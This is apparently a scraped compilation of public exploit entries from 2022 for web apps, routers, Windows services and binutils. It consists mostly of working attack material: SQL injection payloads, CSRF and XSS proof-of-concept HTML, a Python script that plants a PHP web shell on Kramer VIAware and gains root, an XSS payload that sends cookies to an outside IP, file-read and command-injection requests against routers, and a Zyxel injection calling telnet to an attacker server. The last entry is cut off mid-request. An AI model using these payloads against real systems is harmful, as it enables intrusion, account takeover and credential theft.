ISHACK AI BOT

# Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi # Date: April 1st, 2022 # Exploit Author: corpse # Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite # Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite # Version: 1.0 # Tested on: Debian 11 Parameter: poll (GET) Type: time-based blind Title: MySQL time-based blind - Parameter replace (ELT) Payload: poll=ELT(1079=1079,SLEEP(5)) Parameter: pollID (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS) Parameter: voteOpt (POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15

# Exploit Title: Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path # Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid) # Version: 2020.2.20328.2050 # Date: 02/04/2022 # Vendor Homepage: http://gimmal.com/ # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 # CVE: CVE-2022-23909 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode | findstr /i "sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Sherpa Connector Service Sherpa Connector Service C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe Auto C:\>sc qc "Sherpa Connector Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Sherpa Connector Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Sherpa Connector Service DEPENDENCIES : wmiApSrv SERVICE_START_NAME : LocalSystem

# Exploit Title: minewebcms 1.15.2 - Cross-site Scripting (XSS) # Google Dork: NA # Date: 02/20/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://mineweb.org/ # Software Link: https://github.com/mineweb/minewebcms # Version: 1.15.2 # Tested on: KALI OS # CVE : CVE-2022-1163 # --------------- Steps to Reproduce:- => Install the WebApp and Setup it => Login in to webAPP using Admin Creds. => Navigate to "http://localhost/MineWebCMS-1.15.2/admin/navbar" => Add/Edit a Link Select "Drop-Down Menu" => "Link Name" and "URL" Both Input are Vulnerable to Exploit Simple XSS => Payload : <script>alert(1);</script> => XSS will trigger on "http://localhost/MineWebCMS-1.15.2/" Aka WebApp HOME Page Note : As you can see this simple payload working in those two inputs as normally . Whole WebApp Admin Input Structure is allow to do HTML Injection or XSS Injection References: https://huntr.dev/bounties/44d40f34-c391-40c0-a517-12a2c0258149/

# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF) # Google Dork: NA # Date: 03/27/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://qdpm.net/ # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download # Version: 9.2 # Tested on: KALI OS # CVE : CVE-2022-26180 # --------------- Steps to Exploit : 1) Make an HTML file of given POC (Change UserID field Accordingly)and host it. 2) send it to victim. <html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title> <body> <script>history.pushState('', '', '/')</script> <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST"> <input type="hidden" name="sf&#95;method" value="put" /> <input type="hidden" name="users&#91;id&#93;" value="1" /> <!-- Change User ID Accordingly ---> <input type="hidden" name="users&#91;photo&#95;preview&#93;" value="" /> <input type="hidden" name="users&#91;name&#93;" value="AggressiveUser" /> <input type="hidden" name="users&#91;new&#95;password&#93;" value="TEST1122" /> <input type="hidden" name="users&#91;email&#93;" value="administrator&#64;Lulz&#46;com" /> <input type="hidden" name="users&#91;photo&#93;" value="" /> <input type="hidden" name="users&#91;culture&#93;" value="en" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Remote Code Execution as Root on KRAMER VIAware # Date: 31/03/2022 # Exploit Author: sharkmoos # Vendor Homepage: https://www.kramerav.com/ # Software Link: https://www.kramerav.com/us/product/viaware # Version: * # Tested on: ViaWare Go (Linux) # CVE : CVE-2021-35064, CVE-2021-36356 import sys, urllib3 from requests import get, post urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def writeFile(host): headers = { "Host": f"{host}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "text/html, */*", "Accept-Language": "en-GB,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Sec-Gpc": "1", "Te": "trailers", "Connection": "close" } # write php web shell into the Apache web directory data = { "radioBtnVal":"""<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); }?>""", "associateFileName": "/var/www/html/test.php"} post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, verify=False) def getResult(host, cmd): # query the web shell, using rpm as sudo for root privileges file = get(f"https://{host}/test.php?cmd=" + "sudo rpm --eval '%{lua:os.execute(\"" + cmd + "\")}'", verify=False) pageText = file.text if len(pageText) < 1: result = "Command did not return a result" else: result = pageText return result def main(host): # upload malicious php writeFile(host) command = "" while command != "exit": # repeatedly query the webshell command = input("cmd:> ").strip() print(getResult(host, command)) exit() if __name__ == "__main__": if len(sys.argv) == 2: main(sys.argv[1]) else: print(f"Run script in format:\n\n\tpython3 {sys.argv[0]} target\n")

# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion # Date: 29/03/2022 # Exploit Author: Devansh Bordia # Vendor Homepage: https://icehrm.com/ # Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS # Version: 31.0.0.OS #Tested on: Windows 10 # CVE: CVE-2022-26588 1. About - ICEHRM IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible. 2. Description: The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover. 3. Steps To Reproduce: 1.) Now login into the application and go to users. 2.) After this add an user with the name Devansh. 3.) Now try to delete the user and intercept the request in burp suite. We can see no CSRF Token in request. 4.) Go to any CSRF POC Generator: https://security.love/CSRF-PoC-Genorator/ 5.) Now generate a csrf poc for post based requests with necessary parameters. 6.) Finally open that html poc and execute in the same browser session. 7.) Now if we refresh the page, the devansh is deleted to csrf vulnerability. 4. Exploit POC (Exploit.html) <html> <form enctype="application/x-www-form-urlencoded" method="POST" action=" http://localhost:8070/app/service.php"> <table> <tr> <td>t</td> <td> <input type="text" value="User" name="t"> </td> </tr> <tr> <td>a</td> <td> <input type="text" value="delete" name="a"> </td> </tr> <tr> <td>id</td> <td> <input type="text" value="6" name="id"> </td> </tr> </table> <input type="submit" value="http://localhost:8070/app/service.php"> </form> </html>

# Exploit Title: Opmon 9.11 - Cross-site Scripting # Date: 2021-06-01 # Exploit Author: p3tryx # Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time # Version: 9.11 # Tested on: Chrome, IE and Firefox # CVE : CVE-2021-43009 # URL POC: <script> alert(document.cookie); var i=new Image; i.src="http://192.168.0.18:8888/?"+document.cookie; </script> Url-encoded Payload %3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E ``` *https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter* <https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter> [search]=%27};PAYLOAD&x=0&y=0 *https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter* <https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter> [search]=%27}; %3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E &x=0&y=0 ```

# Exploit Title: binutils 2.37 - Objdump Segmentation Fault # Date: 2021-11-03 # Exploit Author: p3tryx # Vendor Homepage: https://www.gnu.org/software/binutils/ # Version: binutils 2.37 # Tested on: Ubuntu 18.04 # CVE : CVE-2021-43149 Payload file ``` %223"\972\00\0083=Q333A111111114111113333<33A $$$\FF)$\80 1114 \00\80\99\00111111111111111-11111111111111111111111111111111111'111111111111111111 111111*111111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111 $%22622FF7FFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%22111111111111111111111111111111111.1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111101111111111111111111111111111111111111111111111111111111111111111111111111111622FF \00\00\00FFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF111111111111111111111111111111111111111111111111111111q1111111111111111111111111111111111111 1))\FF)$1 1111 $%22622FFFFFDFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF11111111111111111,1FF\83 \81 \8D 1111 $%22622FF7FFFFFFFFFFFFFFF \FF \00\80\99\00 1))\FF)$\80 1114 \00\80\99\0011111111111111)111111111111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 { \8D 1111 $%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%2262211111111111111111111111111111111111111111111\00\00 \00111111111111111111111111111111111111111111111FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 111 $%22622FFF1111111111111111111FF\83))\FF)$1 1111 $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF2E2CF9FFFF \98 \81 \8D 1111 $%22622FF7FFFFFFFFF1111111111111111111111111111111111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF1111111111111111111FF\83 \81 \8D 1111 $%22622FF7FFFFFFFFFFFFFFF \FF \00\80\99 1))\FF)$\80 1114 \00\80\99\00111111111111111111111111111111111111111111111111111'111111111111111111 1111111111111111111111111111111>11111111111d\00\00\00111111111111111111 111111111111111111111111111111111111111111111111111*111111111111111111111111.1111111111111111111111111111111;111011111111111111111111111111111111111111111111111111\EA111111111111111 $%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111.1111111111111111111111$1 1111 $%22622FFFFFFF1111111111111111111111111111\BF\BF\BF\BF\BF\BF1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111!11111111111111'111111111111111111 111111111111@111111111111111111d\001111 \0011111111111111111111111111111111111111111111111*1111111111111111111111111111111111111111111111111111111111110111111111151111111111111111111111111111111111111111111111111111)111111111111111111111111111F111111111111111111111111 1111111FFFFFFFFFFLFFFFFFF11111111 111111111111111111111111111111111 $%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111P1111111111111111111111111111111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111N1111111111111111111111111111111111111111111111111 1111111111111111111111111111\FF\FF1111111117111111111111111111111111111111111))\FF)$11111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111111111111111111111111111111111111111@1111111111111111111111111111111111111111111111111111\00\00 \0011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111M111111R111111111111 111111111111 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 1))\FF)$1 1I11 $%22622FFFFFF1FFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF111111111111 111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF$%22622FFFFFFFFFFFFFMFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111FFFFFF \FF \00\80\99\00 1))\FF)$\80 1111 \00\80\99\00a1))\FF)$1 1J11 $%22@22FF11111FFFFFFFFFFFFFF222$)$ ``` RUN the POC # binutils-2.37/binutils/objdump -T -D -x crash_2.37 ASAN:SIGSEGV ================================================================= ==27705==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000000000 bp 0x7fffffffdee0 sp 0x7fffffffde38 T0) ==27705==Hint: pc points to the zero page. AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ??:0 ?? ==27705==ABORTING

# Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR) # Date: 7/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://www.sma.de # Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R # Tested on: Linux [Firefox] # CVE : CVE-2021-46416 # Proof of Concept ============[ Normal user request ]============ GET / HTTP/1.1 Host: 192.168.1.4 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D Upgrade-Insecure-Requests: 1 ============[ Manipulated username request ]============ GET / HTTP/1.1 Host: 192.168.1.4 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D Upgrade-Insecure-Requests: 1

# Exploit Title: MiniTool Partition Wizard - Unquoted Service Path # Date: 07/04/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.minitool.com/ # Software Link: https://www.minitool.com/download-center/ # Version: 12.0 # Tested: Windows 10 Pro x64 es # PoC : C:\Users\saudh>sc qc MTSchedulerService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MTSchedulerService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MTSchedulerService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe" C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Successfully processed 1 files; Failed processing 0 files

# Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI) # Date: 7/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://www.franklinfueling.com/ # Version: 1.8.19.8580 # Tested on: Linux [Firefox] # CVE : CVE-2021-46417 # Proof of Concept ============[ HTTP Exploitation ]============ GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1 Host: 192.168.1.6 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B Upgrade-Insecure-Requests: 1 ============[ URL Exploitation ]============ http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=

# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Creation # Date: 7/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: http://www.telesquare.co.kr/ # Version: TLR-2855KS6 # Tested on: Linux [Firefox] # CVE : CVE-2021-46418 # Proof of Concept PUT /cgi-bin/testing_cve.txt HTTP/1.1 Host: 192.168.1.5 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: nonce=1642692359833588 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 32

# Exploit Title: Razer Sila - Local File Inclusion (LFI) # Google Dork: N/A # Date: 4/9/2022 # Exploit Author: Kevin Randall # Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Version: RazerSila-2.0.441_api-2.0.418 # Tested on: Razer Sila Router # CVE N/A # Proof of Concept # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 123 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]} # Reponse HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 537 {"jsonrpc":"2.0","id":3,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nmosquitto:x:200:200:mosquitto:\/var\/run\/mosquitto:\/bin\/false\nlldp:x:121:129:lldp:\/var\/run\/lldp:\/bin\/false\nadmin:x:1000:1000:root:\/home\/admin:\/bin\/false\nportal:x:1001:1001::\/home\/portal:\/bin\/false\n"}]}

# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion # Date: 7/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: http://www.telesquare.co.kr/ # Version: TLR-2855KS6 # Tested on: Linux [Firefox] # CVE : CVE-2021-46419 # Proof of Concept DELETE /cgi-bin/test.cgi HTTP/1.1 Host: 192.168.1.5 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-type: application/x-www-form-urlencoded Content-Length: 438 Origin: http://192.168.1.5 DNT: 1 Connection: close Referer: http://192.168.1.5/ Cookie: nonce=16426923592222

# Exploit Title: Razer Sila - Command Injection # Google Dork: N/A # Date: 4/9/2022 # Exploit Author: Kevin Randall # Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Version: RazerSila-2.0.441_api-2.0.418 # Tested on: Razer Sila Router # CVE N/A # Proof of Concept # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 117 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]} # Response HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 85 {"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]} # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 117 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]} # Response HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 172 {"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]}

# Exploit Title: Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-04-11 # Vendor : Microsoft # Version : 15.0.847.40 # Tested on OS: Microsoft Exchange Server 2013 SP1 #PoC : ============== C:\>sc qc MSExchangeMailboxAssistants [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: MSExchangeMailboxAssistants TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxAssistants.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : Microsoft Exchange Mailbox Assistants DIPENDENZE : SERVICE_START_NAME : LocalSystem

# Exploit Title: Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-04-11 # Vendor : Microsoft # Version : 15.0.847.40 # Tested on OS: Microsoft Exchange Server 2013 SP1 #PoC : ============== C:\>sc qc MSExchangeADTopology [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: MSExchangeADTopology TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : Microsoft Exchange Active Directory Topology DIPENDENZE : SERVICE_START_NAME : LocalSystem

# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection # Date: 2022-04-11 # Exploit Author: Mohsen Dehghani (aka 0xProfessional) # Vendor Homepage: https://motopress.com/ # Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip # Version: 4.2.4 # Tested on: Windows/XAMPP ########################################################################### PoC: Vulnerable File:sync-urls-repository.php public function insertUrls($roomId, $urls) { global $wpdb; if (empty($urls)) { return; } $urls = $this->prepareUrls($urls); $values = array(); foreach ($urls as $syncId => $url) { $values[] = $wpdb->prepare("(%d, %s, %s)", $roomId, $syncId, $url); } $sql = "INSERT INTO {$this->tableName} (room_id, sync_id, calendar_url)" . " VALUES " . implode(', ', $values); $wpdb->query($sql); Vulnerable Parameter: room_id=SQL Injection sync_id=SQL Injection

# Exploit Title: Zyxel NWA-1100-NH - Command Injection # Date: 12/4/2022 # Exploit Author: Ahmed Alroky # Vendor Homepage: https://www.zyxel.com/homepage.shtml # Version: ALL BEFORE 2.12 # Tested on: Linux # CVE : CVE-2021-4039 # References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf , https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml HTTP Request : POST /login/login.html HTTP/1.1 Host: IP_address:8081 Content-Length: 80 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http:/IP_address:8081 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://IP_address:8081/login/login.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login

# Exploit Title: Scriptcasr 9.7 arbitrary file upload getshell # Date: 2022-04-08 # Exploit Author: luckyt0mat0 # Vendor Homepage: https://www.scriptcase.net/ # Software Link: https://www.scriptcase.net/download/ # Version: 9.7 # Tested on: Windows Server 2019 # Proof of Concept: POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1 Host: 10.50.1.214:8091 Content-Length: 570 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ Origin: http://10.50.1.214:8091 Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; 